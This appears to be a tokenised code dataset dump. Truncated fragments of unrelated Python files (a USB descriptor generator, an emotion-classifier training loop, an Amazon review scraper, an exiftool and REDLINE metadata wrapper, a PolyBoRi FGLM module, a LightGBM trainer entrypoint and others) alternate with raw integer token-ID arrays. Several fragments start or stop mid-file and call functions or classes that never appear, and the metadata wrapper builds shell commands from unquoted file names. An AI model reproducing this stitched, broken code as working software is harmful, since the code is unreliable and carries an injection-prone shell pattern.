""".format(DESCRIPTION=descriptor.description, CLASS=descriptor.__class__)) b = bytes(descriptor) notes = descriptor.notes() i = 0 # This prints each subdescriptor on a separate line. n = 0 while i < len(b): length = b[i] for j in range(length): c_file.write("0x{:02x}, ".format(b[i + j])) c_file.write("// " + notes[n]) n += 1 c_file.write("\n") i += length descriptor_length += len(b) c_file.write("""\ }; """) pointers_to_strings = [] for idx, descriptor in enumerate(string_descriptors): c_file.write("""\ // {DESCRIPTION} : {CLASS} """.format(DESCRIPTION=descriptor.description, CLASS=descriptor.__class__)) b = bytes(descriptor) notes = descriptor.notes() i = 0 # This prints each subdescriptor on a separate line. variable_name = StringIndex.index_to_variable[idx] if not variable_name: variable_name = "string_descriptor{}".format(idx) const = "const " if variable_name == "usb_serial_number": const = "" c_file.write("""\ {const}uint16_t {NAME}[] = {{ """.format(const=const, NAME=variable_name)) pointers_to_strings.append("{name}".format(name=variable_name)) n = 0 while i < len(b): length = b[i] for j in range(length // 2): c_file.write("0x{:04x}, ".format(b[i + 2*j + 1] << 8 | b[i + 2*j])) n += 1 c_file.write("\n") i += length c_file.write("""\ }; """) c_file.write("""\ // array of pointer to string descriptors uint16_t const * const string_desc_arr [] = { """) c_file.write(""",\ """.join(pointers_to_strings)) c_file.write(""" }; """) c_file.write("\n") hid_descriptor_length = len(bytes(combined_hid_report_descriptor)) # Now we values we need for the .h file. h_file.write("""\ #ifndef MICROPY_INCLUDED_AUTOGEN_USB_DESCRIPTOR_H #define MICROPY_INCLUDED_AUTOGEN_USB_DESCRIPTOR_H #include <stdint.h> extern const uint8_t usb_desc_dev[{device_length}]; extern const uint8_t usb_desc_cfg[{configuration_length}]; extern uint16_t usb_serial_number[{serial_number_length}]; extern uint16_t const * const string_desc_arr [{string_descriptor_length}]; extern const uint8_t hid_report_descriptor[{hid_report_descriptor_length}]; #define CFG_TUSB_RHPORT0_MODE ({rhport0_mode}) #define USB_HID_NUM_DEVICES {hid_num_devices} // Vendor name included in Inquiry response, max 8 bytes #define CFG_TUD_MSC_VENDOR "{msc_vendor}" // Product name included in Inquiry response, max 16 bytes #define CFG_TUD_MSC_PRODUCT "{msc_product}" """ .format(serial_number_length=len(bytes(serial_number_descriptor)) // 2, device_length=len(bytes(device)), configuration_length=descriptor_length, max_configuration_length=max(hid_descriptor_length, descriptor_length), string_descriptor_length=len(pointers_to_strings), hid_report_descriptor_length=len(bytes(combined_hid_report_descriptor)), rhport0_mode='OPT_MODE_DEVICE | OPT_MODE_HIGH_SPEED' if args.highspeed else 'OPT_MODE_DEVICE', hid_num_devices=len(args.hid_devices), msc_vendor=args.manufacturer[:8], msc_product=args.product[:16])) # Write out the report descriptor and info c_file.write("""\ const uint8_t hid_report_descriptor[{HID_DESCRIPTOR_LENGTH}] = {{ """.format(HID_DESCRIPTOR_LENGTH=hid_descriptor_length)) for b in bytes(combined_hid_report_descriptor): c_file.write("0x{:02x}, ".format(b)) c_file.write("""\ }; """) # Write out USB HID report buffer definitions. for name in args.hid_devices: c_file.write("""\ static uint8_t {name}_report_buffer[{report_length}]; """.format(name=name.lower(), report_length=hid_report_descriptors.HID_DEVICE_DATA[name].report_length)) if hid_report_descriptors.HID_DEVICE_DATA[name].out_report_length > 0: c_file.write("""\ static uint8_t {name}_out_report_buffer[{report_length}]; """.format(name=name.lower(), report_length=hid_report_descriptors.HID_DEVICE_DATA[name].out_report_length)) # Write out table of device objects. c_file.write(""" usb_hid_device_obj_t usb_hid_devices[] = { """) for name in args.hid_devices: device_data = hid_report_descriptors.HID_DEVICE_DATA[name] out_report_buffer = '{}_out_report_buffer'.format(name.lower()) if device_data.out_report_length > 0 else 'NULL' c_file.write("""\ {{ .base = {{ .type = &usb_hid_device_type }}, .report_buffer = {name}_report_buffer, .report_id = {report_id}, .report_length = {report_length}, .usage_page = {usage_page:#04x}, .usage = {usage:#04x}, .out_report_buffer = {out_report_buffer}, .out_report_length = {out_report_length}, }}, """.format(name=name.lower(), report_id=report_ids[name], report_length=device_data.report_length, usage_page=device_data.usage_page, usage=device_data.usage, out_report_buffer=out_report_buffer, out_report_length=device_data.out_report_length)) c_file.write("""\ }; """) # Write out tuple of device objects. c_file.write(""" mp_obj_tuple_t common_hal_usb_hid_devices = {{ .base = {{ .type = &mp_type_tuple, }}, .len = {num_devices}, .items = {{ """.format(num_devices=len(args.hid_devices))) for idx in range(len(args.hid_devices)): c_file.write("""\ (mp_obj_t) &usb_hid_devices[{idx}], """.format(idx=idx)) c_file.write("""\ }, }; """) h_file.write("""\ #endif // MICROPY_INCLUDED_AUTOGEN_USB_DESCRIPTOR_H """)
[ 2, 30628, 55, 12, 8979, 15269, 8206, 25, 1946, 4527, 37906, 1222, 13588, 37906, 20420, 357, 5450, 1378, 12567, 13, 785, 14, 324, 1878, 4872, 14, 21170, 5013, 29412, 14, 34960, 82, 14, 3642, 2455, 669, 8, 198, 2, 198, 2, 30628, 55, ...
2.381063
9,875
from tqdm import tqdm import pandas as pd import numpy as np, argparse, time, pickle, random, os, datetime import torch import torch.optim as optim from model import MaskedNLLLoss, BC_LSTM from dataloader import MELDDataLoader from sklearn.metrics import f1_score, confusion_matrix, accuracy_score, classification_report def setup_seed(seed): """ Manually Fix the random seed to get deterministic results. """ torch.manual_seed(seed) torch.cuda.manual_seed(seed) torch.cuda.manual_seed_all(seed) np.random.seed(seed) random.seed(seed) torch.benchmark = False torch.backends.cudnn.deterministic = True if __name__ == '__main__': args = parse_args() args.cuda = torch.cuda.is_available() if args.cuda: print('Running on GPU') else: print('Running on CPU') for seed in [1, 11, 111, 1111, 11111]: setup_seed(seed) args.seed = seed print(args) model = BC_LSTM(args) print('MELD BC_LSTM MODULE ...') if args.cuda: model.cuda() loss_weights = torch.FloatTensor([1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0]) loss_function = MaskedNLLLoss(loss_weights.cuda() if args.cuda else loss_weights) optimizer = optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.l2) lf = open('logs/cnn_meld_logs.txt', 'a') dataloader = MELDDataLoader(args) valid_losses, valid_fscores = [], [] test_fscores, test_accuracys, test_losses = [], [], [] best_loss, best_label, best_pred, best_mask = None, None, None, None for e in range(args.epochs): start_time = time.time() train_loss, train_acc, _, _, _, train_fscore = train_or_eval_model(model, loss_function, dataloader['train'], e, optimizer, mode='train') valid_loss, valid_acc, _, _, _, valid_fscore = train_or_eval_model(model, loss_function, dataloader['valid'], e, mode='valid') test_loss, test_acc, test_label, test_pred, test_mask, test_fscore = train_or_eval_model(model, loss_function, dataloader['test'], e, mode='test') valid_losses.append(valid_loss) valid_fscores.append(valid_fscore) test_losses.append(test_loss) test_accuracys.append(test_acc) test_fscores.append(test_fscore) x = 'epoch: {}, train_loss: {}, acc: {}, fscore: {}, valid_loss: {}, acc: {}, fscore: {}, test_loss: {}, acc: {}, fscore: {}, time: {} sec'.format(e+1, train_loss, train_acc, train_fscore, valid_loss, valid_acc, valid_fscore, test_loss, test_acc, test_fscore, round(time.time()-start_time, 2)) print (x) lf.write(x + '\n') valid_fscores = np.array(valid_fscores).transpose() test_fscores = np.array(test_fscores).transpose() # [1, epoches] test_accuracys = np.array(test_accuracys).transpose() # [epoches] f1_score1 = test_fscores[0][np.argmin(valid_losses)] acc_score1 = test_accuracys[np.argmin(valid_losses)] f1_score2 = test_fscores[0][np.argmax(valid_fscores[0])] acc_score2 = test_accuracys[np.argmax(valid_fscores[0])] scores = [acc_score1, f1_score1, acc_score2, f1_score2] scores = [str(item) for item in scores] print ('Test Scores: Weighted F1') print('@Best Valid Loss: Test Acc: {}, Test F1: {}'.format(acc_score1, f1_score1)) print('@Best Valid F1: Test Acc: {}, Test F1: {}'.format(acc_score2, f1_score2)) rf = open('results/cnn_meld_results.txt', 'a') rf.write('\t'.join(scores) + '\t' + str(args) + '\n') rf.close()
[ 6738, 256, 80, 36020, 1330, 256, 80, 36020, 198, 11748, 19798, 292, 355, 279, 67, 198, 11748, 299, 32152, 355, 45941, 11, 1822, 29572, 11, 640, 11, 2298, 293, 11, 4738, 11, 28686, 11, 4818, 8079, 198, 198, 11748, 28034, 198, 198, 11...
2.119454
1,758
#!/usr/bin/env python import os import sys import argparse import pat3dem.star as p3s import math if __name__ == '__main__': main()
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 198, 11748, 28686, 198, 11748, 25064, 198, 11748, 1822, 29572, 198, 11748, 1458, 18, 9536, 13, 7364, 355, 279, 18, 82, 198, 11748, 10688, 198, 197, 197, 197, 198, 361, 11593, 3672, 834...
2.603774
53
from bs4 import BeautifulSoup import pandas as pd import requests import time import sys def reviews_scraper(asin_list, filename): ''' Takes a list of asins, retrieves html for reviews page, and parses out key data points Parameters ---------- List of ASINs (list of strings) Returns: ------- review information (list), reviews_df (Pandas DataFrame) ''' asin_list = [asin_list] print(asin_list) reviews = [] headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0", "Accept-Encoding":"gzip, deflate", "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "DNT":"1","Connection":"close", "Upgrade-Insecure-Requests":"1"} for asin in asin_list: print(f'Collecting reviews for {asin}') passed_last_page = None counter = 1 while (passed_last_page == None) and (counter <= 10): print(len(reviews)) reviews_url = f'https://www.amazon.com/product-reviews/{asin}/ref=cm_cr_arp_d_viewopt_srt?ie=UTF8&reviewerType=all_reviews&sortBy=recent&pageNumber={counter}' print(reviews_url) rev = requests.get(reviews_url, headers=headers) print(rev.status_code) reviews_page_content = rev.content review_soup = BeautifulSoup(reviews_page_content, features='lxml') print(review_soup) passed_last_page = review_soup.find('div', attrs={'class': 'a-section a-spacing-top-large a-text-center no-reviews-section'}) if passed_last_page == None: for d in review_soup.findAll('div', attrs={'data-hook':'review'}): # print(d) try: date = d.find('span', attrs={'data-hook':'review-date'}) date = date.text.split(' ')[-3:] date = ' '.join(date) except: date = 'null' try: title = d.find('a', attrs={'data-hook': 'review-title'}) except: title = 'null' try: product = d.find('a', attrs={'data-hook': 'format-strip'}) product = product.text except: product = 'null' try: review_asin = product['href'].split('/')[3] except: review_asin = asin try: verified = d.find('span', attrs={'data-hook':'avp-badge'}) if verified == None: verified = 'Not Verified' else: verified = verified.text except: verified = 'null' try: description = d.find('span', attrs={'data-hook': 'review-body'}) except: description = 'null' try: reviewer_name = d.find('span', attrs={'class': 'a-profile-name'}) except: reviewer_name = 'null' try: stars = d.find('span', attrs={'class': 'a-icon-alt'}) except: stars = 'null' reviews.append([review_asin, product, date, verified, title.text, description.text, reviewer_name.text, float(stars.text[0:3])]) else: pass counter += 1 time.sleep(15) reviews_df = pd.DataFrame(reviews, columns=['asin','product','date', 'verified', 'title', 'desc', 'reviewer_name', 'rating']) reviews_df.to_csv(f'data/reviews/{filename}') print(f'{len(reviews)} reviews for {len(asin_list)} asins stored successfully in {filename}') return reviews, reviews_df if __name__ == '__main__': reviews_scraper(*sys.argv[1:])
[ 6738, 275, 82, 19, 1330, 23762, 50, 10486, 198, 11748, 19798, 292, 355, 279, 67, 198, 11748, 7007, 198, 11748, 640, 198, 11748, 25064, 628, 198, 4299, 8088, 62, 1416, 38545, 7, 47337, 62, 4868, 11, 29472, 2599, 198, 220, 220, 220, 7...
1.809706
2,349
# noinspection PyUnresolvedReferences import os import re # TODO I'm going to need to make a dictionary for my big list of stuff i care about and what's needed for # every file type.... RAF = ['EXIF:LensModel', 'MakerNotes:RawImageHeight', 'MakerNotes:RawImageWidth', 'EXIF:CreateDate', 'EXIF:ModifyDate', 'EXIF:SerialNumber', 'Composite:Aperture', 'EXIF:FocalLength', 'EXIF:Make', 'EXIF:Model', 'EXIF:LensMake'] MOV = ['EXIF:LensModel', 'MakerNotes:RawImageHeight', 'MakerNotes:RawImageWidth', 'EXIF:CreateDate', 'EXIF:ModifyDate', 'EXIF:SerialNumber', 'Composite:Aperture', 'EXIF:FocalLength', 'EXIF:Make', 'EXIF:Model', 'EXIF:LensMake', 'QuickTime:VideoFrameRate', 'QuickTime:Duration'] R3D = ['ClipName', 'EdgeTC', 'EndEdgeTC', 'TotalFrames', 'FrameHeight', 'FrameWidth', 'Aperture', 'ISO', 'Date', 'AudioSlate', 'VideoSlate', 'Camera', 'CameraModel', 'CameraPIN', 'MediaSerialNumber', 'LensSerialNumber', 'FPS', 'AspectRatio', 'Kelvin', 'LensName', 'LensBrand', 'FocalLength', 'Shutter(deg)', 'SensorID', 'SensorName', 'Take'] def check_exiftool(): """ checks if exiftool is installed. :return: """ pass def check_redline(): """ checks if redline is installed :return: """ pass def check_ffprobe(): """ checks if ffprobe is installed :return: """ pass def get(filein, tool='exiftool', print_output=False): """ Due to issues with the exiftool module this is provided as a way to parse output directly from exiftool through the system commands and cglexecute. For the moment it's only designed to get the lumberdata for a single file. :param filein: :return: dictionary containing lumberdata from exiftool """ ext = os.path.splitext(filein)[-1] d = {} if tool == 'exiftool': command = r'exiftool %s' % filein output = cgl_execute(command=command, verbose=False, print_output=print_output) for each in output['printout']: key, value = re.split("\s+:\s+", each) d[key] = value return d elif tool == 'ffprobe': command = r'%s %s' % ('ffprobe', filein) output = cgl_execute(command=command) for each in output['printout']: try: values = re.split(":\s+", each) key = values[0] values.pop(0) if 'Stream' in key: split_v = values[1].split(',') d['Image Size'] = split_v[2].split()[0] d['Source Image Width'], d['Source Image Height'] = d['Image Size'].split('x') d['Video Frame Rate'] = split_v[4].split(' fps')[0].replace(' ', '') if 'Duration' in key: d['Track Duration'] = '%s s' % values[0].split(',')[0] value = ' '.join(values) d[key] = value except ValueError: print('skipping %s' % each) return d def get_red_data(filein): """ method for pulling lumberdata from r3d files. REDLINE is a command line interface from RED that is required for this https://www.red.com/downloads/options?itemInternalId=16144 :param filein: :return: """ file_, ext_ = os.path.splitext(filein) if ext_.upper() == '.R3D': command = r'REDLINE --i %s --printMeta 1' % filein d = {} for line in os.popen(command).readlines(): line = line.strip('\n') line = line.replace('\t', '') line = line.replace(' ', '') try: key_, value = line.split(':', 1) if key_ != 'None': d[key_] = value except ValueError: pass return d
[ 2, 645, 1040, 14978, 9485, 3118, 411, 5634, 19927, 198, 11748, 28686, 198, 11748, 302, 198, 198, 2, 16926, 46, 314, 1101, 1016, 284, 761, 284, 787, 257, 22155, 329, 616, 1263, 1351, 286, 3404, 1312, 1337, 546, 290, 644, 338, 2622, 3...
2.229547
1,699
import logging from typing import List, Callable import numpy as np from pyquaternion import Quaternion from pyrep import PyRep from pyrep.errors import IKError from pyrep.objects import Dummy, Object from rlbench import utils from rlbench.action_modes import ArmActionMode, ActionMode from rlbench.backend.exceptions import BoundaryError, WaypointError from rlbench.backend.observation import Observation from rlbench.backend.robot import Robot from rlbench.backend.scene import Scene from rlbench.backend.task import Task from rlbench.demo import Demo from rlbench.observation_config import ObservationConfig _TORQUE_MAX_VEL = 9999 _DT = 0.05 _MAX_RESET_ATTEMPTS = 40 _MAX_DEMO_ATTEMPTS = 10
[ 11748, 18931, 198, 6738, 19720, 1330, 7343, 11, 4889, 540, 198, 198, 11748, 299, 32152, 355, 45941, 198, 6738, 12972, 421, 9205, 295, 1330, 2264, 9205, 295, 198, 6738, 12972, 7856, 1330, 9485, 6207, 198, 6738, 12972, 7856, 13, 48277, 13...
3.125
224
from django import forms from django.contrib.contenttypes.forms import generic_inlineformset_factory from django.contrib.contenttypes.models import ContentType from django.db import models from django.test import TestCase from django.test.utils import isolate_apps from .models import ( Animal, ForProxyModelModel, Gecko, Mineral, ProxyRelatedModel, TaggedItem, )
[ 6738, 42625, 14208, 1330, 5107, 201, 198, 6738, 42625, 14208, 13, 3642, 822, 13, 11299, 19199, 13, 23914, 1330, 14276, 62, 45145, 687, 2617, 62, 69, 9548, 201, 198, 6738, 42625, 14208, 13, 3642, 822, 13, 11299, 19199, 13, 27530, 1330, ...
3.208333
120
from .PyPolyBoRi import (BooleSet, Polynomial, BoolePolynomialVector, FGLMStrategy) def _fglm(I, from_ring, to_ring): r""" Unchecked variant of fglm """ vec = BoolePolynomialVector(I) return FGLMStrategy(from_ring, to_ring, vec).main() def fglm(I, from_ring, to_ring): r""" Convert *reduced* Groebner Basis in from_ring to a GroebnerBasis in to_ring. It acts independent of the global ring, which is restored at the end of the computation. TESTS:: sage: from sage.rings.polynomial.pbori import * sage: from sage.rings.polynomial.pbori.PyPolyBoRi import OrderCode sage: dp_asc = OrderCode.dp_asc sage: r=declare_ring(['x','y','z'],dict()) sage: old_ring = r sage: new_ring = old_ring.clone(ordering=dp_asc) sage: (x,y,z) = [old_ring.variable(i) for i in range(3)] sage: ideal=[x+z, y+z]# lp Groebner basis sage: from sage.rings.polynomial.pbori.fglm import fglm sage: list(fglm(ideal, old_ring, new_ring)) [y + x, z + x] """ for poly in I: if poly.ring().id() != from_ring.id(): raise ValueError("Ideal I must be from the first ring argument") return _fglm(I, from_ring, to_ring) def vars_real_divisors(monomial, monomial_set): r""" Returns all elements of of monomial_set, which result multiplied by a variable in monomial. TESTS:: sage: from sage.rings.polynomial.pbori.pbori import * sage: from sage.rings.polynomial.pbori.PyPolyBoRi import OrderCode sage: dp_asc = OrderCode.dp_asc sage: from sage.rings.polynomial.pbori.PyPolyBoRi import Ring sage: r=Ring(1000) sage: x = r.variable sage: b=BooleSet([x(1)*x(2),x(2)]) sage: from sage.rings.polynomial.pbori.fglm import vars_real_divisors sage: vars_real_divisors(x(1)*x(2)*x(3),b) {{x(1),x(2)}} """ return BooleSet(Polynomial(monomial_set.divisors_of(monomial)). \ graded_part(monomial.deg() - 1)) def m_k_plus_one(completed_elements, variables): r""" Calculates $m_{k+1}$ from the FGLM algorithm as described in Wichmanns diploma thesis It would be nice to be able to efficiently extract the smallest term of a polynomial. TESTS:: sage: from sage.rings.polynomial.pbori.pbori import * sage: from sage.rings.polynomial.pbori.PyPolyBoRi import OrderCode sage: dp_asc = OrderCode.dp_asc sage: from sage.rings.polynomial.pbori.PyPolyBoRi import Ring sage: r=Ring(1000) sage: x = r.variable sage: from sage.rings.polynomial.pbori.PyPolyBoRi import Monomial sage: s=BooleSet([x(1)*x(2),x(1),x(2),Monomial(r),x(3)]) sage: from sage.rings.polynomial.pbori.fglm import m_k_plus_one sage: variables=BooleSet([x(1),x(2),x(3)]) sage: m_k_plus_one(s,variables) x(2)*x(3) sage: r2 = r.clone(ordering=dp_asc) sage: m_k_plus_one(r2(s).set(),r2(variables).set()) x(1)*x(3) """ return sorted(completed_elements.cartesian_product(variables).diff( completed_elements))[0]
[ 6738, 764, 20519, 34220, 16635, 49, 72, 1330, 357, 46120, 293, 7248, 11, 12280, 26601, 498, 11, 21458, 293, 34220, 26601, 498, 38469, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220,...
2.12942
1,499
""" Uses UMAP (https://umap-learn.readthedocs.io/en/latest/index.html) to reduce course embeddings to two dimensions for visualization. """ import pandas as pd import umap from sklearn.preprocessing import StandardScaler from ferry import config courses = pd.read_csv( config.DATA_DIR / "course_embeddings/courses_deduplicated.csv", index_col=0, ) # mypy: ignore-errors embeddings = pd.read_hdf( config.DATA_DIR / "course_embeddings/fasttext_embeddings.h5", key="embeddings", ) embeddings = StandardScaler().fit_transform(embeddings) reducer = umap.UMAP() umap_embeddings = reducer.fit_transform(embeddings) courses["umap1"] = umap_embeddings[:, 0] courses["umap2"] = umap_embeddings[:, 1] courses.to_csv(config.DATA_DIR / "course_embeddings/courses_deduplicated_umap.csv")
[ 37811, 198, 5842, 274, 471, 33767, 357, 5450, 1378, 388, 499, 12, 35720, 13, 961, 83, 704, 420, 82, 13, 952, 14, 268, 14, 42861, 14, 9630, 13, 6494, 8, 284, 4646, 1781, 198, 20521, 67, 654, 284, 734, 15225, 329, 32704, 13, 198, ...
2.587662
308
import inheritance shark = Predator('baby shark','sea','all',20) giraffe = Mammal('malwan','earth',20) giraffe.check_planet(inheritance.friendly) marti = Mammal('marti','earth',20) marti.check_planet(inheritance.friendly) print(inheritance.friendly.__dict__) print(inheritance.Planet.__dict__)
[ 11748, 24155, 628, 628, 628, 198, 1477, 668, 796, 38871, 10786, 40252, 21027, 41707, 8583, 41707, 439, 3256, 1238, 8, 198, 198, 70, 343, 21223, 796, 39502, 282, 10786, 7617, 8149, 41707, 16442, 3256, 1238, 8, 198, 70, 343, 21223, 13, ...
2.831776
107
#!/usr/bin/python # -*- coding: utf-8 -*- # Copyright (C) 2017, Luis Pedro Coelho <luis@luispedro.org> # vim: set ts=4 sts=4 sw=4 expandtab smartindent: # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. from . import SubCommand __all__ = ['DemoCommand'] demo = DemoCommand()
[ 2, 48443, 14629, 14, 8800, 14, 29412, 198, 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 2, 15069, 357, 34, 8, 2177, 11, 20894, 28855, 1766, 417, 8873, 1279, 2290, 271, 31, 2290, 8802, 276, 305, 13, 2398, 29, 19...
3.454787
376
"""Tests for simple search controller, :mod:`search.controllers.simple`.""" from http import HTTPStatus from unittest import TestCase, mock from werkzeug.datastructures import MultiDict from werkzeug.exceptions import InternalServerError, NotFound, BadRequest from search.domain import SimpleQuery from search.controllers import simple from search.controllers.simple.forms import SimpleSearchForm from search.services.index import ( IndexConnectionError, QueryError, DocumentNotFound, )
[ 37811, 51, 3558, 329, 2829, 2989, 10444, 11, 1058, 4666, 25, 63, 12947, 13, 3642, 36667, 13, 36439, 63, 526, 15931, 198, 198, 6738, 2638, 1330, 14626, 19580, 198, 6738, 555, 715, 395, 1330, 6208, 20448, 11, 15290, 198, 198, 6738, 266,...
3.577465
142
#!/usr/bin/env python # ROS Libraries import actionlib from actionlib_msgs.msg import GoalStatus from control_msgs.msg import JointTrajectoryControllerState, FollowJointTrajectoryAction, FollowJointTrajectoryGoal from kuri_wandering_robot.msg import Power from wandering_behavior.msg import WanderAction, WanderGoal import rospy from sensor_msgs.msg import CompressedImage from std_msgs.msg import Empty from trajectory_msgs.msg import JointTrajectoryPoint # Python Default Libraries import base64 import csv from enum import Enum import os import requests import threading import time import traceback # Custom Libraries from sent_messages_database import SentMessagesDatabase if __name__ == "__main__": rospy.init_node("kuri_wandering_robot") kuri_wandering_robot = KuriWanderingRobot() rospy.spin()
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 2, 48263, 46267, 198, 11748, 2223, 8019, 198, 6738, 2223, 8019, 62, 907, 14542, 13, 19662, 1330, 25376, 19580, 198, 6738, 1630, 62, 907, 14542, 13, 19662, 1330, 16798, 15721, 752, 652, ...
3.348361
244
# - Generated by tools/entrypoint_compiler.py: do not edit by hand """ Trainers.LightGbmBinaryClassifier """ import numbers from ..utils.entrypoints import EntryPoint from ..utils.utils import try_set, unlist def trainers_lightgbmbinaryclassifier( training_data, predictor_model=None, number_of_iterations=100, learning_rate=None, number_of_leaves=None, minimum_example_count_per_leaf=None, feature_column_name='Features', booster=None, label_column_name='Label', example_weight_column_name=None, row_group_column_name=None, normalize_features='Auto', caching='Auto', unbalanced_sets=False, weight_of_positive_examples=1.0, sigmoid=0.5, evaluation_metric='Logloss', maximum_bin_count_per_feature=255, verbose=False, silent=True, number_of_threads=None, early_stopping_round=0, batch_size=1048576, use_categorical_split=None, handle_missing_value=True, use_zero_as_missing_value=False, minimum_example_count_per_group=100, maximum_categorical_split_point_count=32, categorical_smoothing=10.0, l2_categorical_regularization=10.0, seed=None, parallel_trainer=None, **params): """ **Description** Train a LightGBM binary classification model. :param number_of_iterations: Number of iterations. (inputs). :param training_data: The data to be used for training (inputs). :param learning_rate: Shrinkage rate for trees, used to prevent over-fitting. Range: (0,1]. (inputs). :param number_of_leaves: Maximum leaves for trees. (inputs). :param minimum_example_count_per_leaf: Minimum number of instances needed in a child. (inputs). :param feature_column_name: Column to use for features (inputs). :param booster: Which booster to use, can be gbtree, gblinear or dart. gbtree and dart use tree based model while gblinear uses linear function. (inputs). :param label_column_name: Column to use for labels (inputs). :param example_weight_column_name: Column to use for example weight (inputs). :param row_group_column_name: Column to use for example groupId (inputs). :param normalize_features: Normalize option for the feature column (inputs). :param caching: Whether trainer should cache input training data (inputs). :param unbalanced_sets: Use for binary classification when training data is not balanced. (inputs). :param weight_of_positive_examples: Control the balance of positive and negative weights, useful for unbalanced classes. A typical value to consider: sum(negative cases) / sum(positive cases). (inputs). :param sigmoid: Parameter for the sigmoid function. (inputs). :param evaluation_metric: Evaluation metrics. (inputs). :param maximum_bin_count_per_feature: Maximum number of bucket bin for features. (inputs). :param verbose: Verbose (inputs). :param silent: Printing running messages. (inputs). :param number_of_threads: Number of parallel threads used to run LightGBM. (inputs). :param early_stopping_round: Rounds of early stopping, 0 will disable it. (inputs). :param batch_size: Number of entries in a batch when loading data. (inputs). :param use_categorical_split: Enable categorical split or not. (inputs). :param handle_missing_value: Enable special handling of missing value or not. (inputs). :param use_zero_as_missing_value: Enable usage of zero (0) as missing value. (inputs). :param minimum_example_count_per_group: Minimum number of instances per categorical group. (inputs). :param maximum_categorical_split_point_count: Max number of categorical thresholds. (inputs). :param categorical_smoothing: Lapalace smooth term in categorical feature spilt. Avoid the bias of small categories. (inputs). :param l2_categorical_regularization: L2 Regularization for categorical split. (inputs). :param seed: Sets the random seed for LightGBM to use. (inputs). :param parallel_trainer: Parallel LightGBM Learning Algorithm (inputs). :param predictor_model: The trained model (outputs). """ entrypoint_name = 'Trainers.LightGbmBinaryClassifier' inputs = {} outputs = {} if number_of_iterations is not None: inputs['NumberOfIterations'] = try_set( obj=number_of_iterations, none_acceptable=True, is_of_type=numbers.Real) if training_data is not None: inputs['TrainingData'] = try_set( obj=training_data, none_acceptable=False, is_of_type=str) if learning_rate is not None: inputs['LearningRate'] = try_set( obj=learning_rate, none_acceptable=True, is_of_type=numbers.Real) if number_of_leaves is not None: inputs['NumberOfLeaves'] = try_set( obj=number_of_leaves, none_acceptable=True, is_of_type=numbers.Real) if minimum_example_count_per_leaf is not None: inputs['MinimumExampleCountPerLeaf'] = try_set( obj=minimum_example_count_per_leaf, none_acceptable=True, is_of_type=numbers.Real) if feature_column_name is not None: inputs['FeatureColumnName'] = try_set( obj=feature_column_name, none_acceptable=True, is_of_type=str, is_column=True) if booster is not None: inputs['Booster'] = try_set( obj=booster, none_acceptable=True, is_of_type=dict) if label_column_name is not None: inputs['LabelColumnName'] = try_set( obj=label_column_name, none_acceptable=True, is_of_type=str, is_column=True) if example_weight_column_name is not None: inputs['ExampleWeightColumnName'] = try_set( obj=example_weight_column_name, none_acceptable=True, is_of_type=str, is_column=True) if row_group_column_name is not None: inputs['RowGroupColumnName'] = try_set( obj=row_group_column_name, none_acceptable=True, is_of_type=str, is_column=True) if normalize_features is not None: inputs['NormalizeFeatures'] = try_set( obj=normalize_features, none_acceptable=True, is_of_type=str, values=[ 'No', 'Warn', 'Auto', 'Yes']) if caching is not None: inputs['Caching'] = try_set( obj=caching, none_acceptable=True, is_of_type=str, values=[ 'Auto', 'Memory', 'None']) if unbalanced_sets is not None: inputs['UnbalancedSets'] = try_set( obj=unbalanced_sets, none_acceptable=True, is_of_type=bool) if weight_of_positive_examples is not None: inputs['WeightOfPositiveExamples'] = try_set( obj=weight_of_positive_examples, none_acceptable=True, is_of_type=numbers.Real) if sigmoid is not None: inputs['Sigmoid'] = try_set( obj=sigmoid, none_acceptable=True, is_of_type=numbers.Real) if evaluation_metric is not None: inputs['EvaluationMetric'] = try_set( obj=evaluation_metric, none_acceptable=True, is_of_type=str, values=[ 'None', 'Default', 'Logloss', 'Error', 'AreaUnderCurve']) if maximum_bin_count_per_feature is not None: inputs['MaximumBinCountPerFeature'] = try_set( obj=maximum_bin_count_per_feature, none_acceptable=True, is_of_type=numbers.Real) if verbose is not None: inputs['Verbose'] = try_set( obj=verbose, none_acceptable=True, is_of_type=bool) if silent is not None: inputs['Silent'] = try_set( obj=silent, none_acceptable=True, is_of_type=bool) if number_of_threads is not None: inputs['NumberOfThreads'] = try_set( obj=number_of_threads, none_acceptable=True, is_of_type=numbers.Real) if early_stopping_round is not None: inputs['EarlyStoppingRound'] = try_set( obj=early_stopping_round, none_acceptable=True, is_of_type=numbers.Real) if batch_size is not None: inputs['BatchSize'] = try_set( obj=batch_size, none_acceptable=True, is_of_type=numbers.Real) if use_categorical_split is not None: inputs['UseCategoricalSplit'] = try_set( obj=use_categorical_split, none_acceptable=True, is_of_type=bool) if handle_missing_value is not None: inputs['HandleMissingValue'] = try_set( obj=handle_missing_value, none_acceptable=True, is_of_type=bool) if use_zero_as_missing_value is not None: inputs['UseZeroAsMissingValue'] = try_set( obj=use_zero_as_missing_value, none_acceptable=True, is_of_type=bool) if minimum_example_count_per_group is not None: inputs['MinimumExampleCountPerGroup'] = try_set( obj=minimum_example_count_per_group, 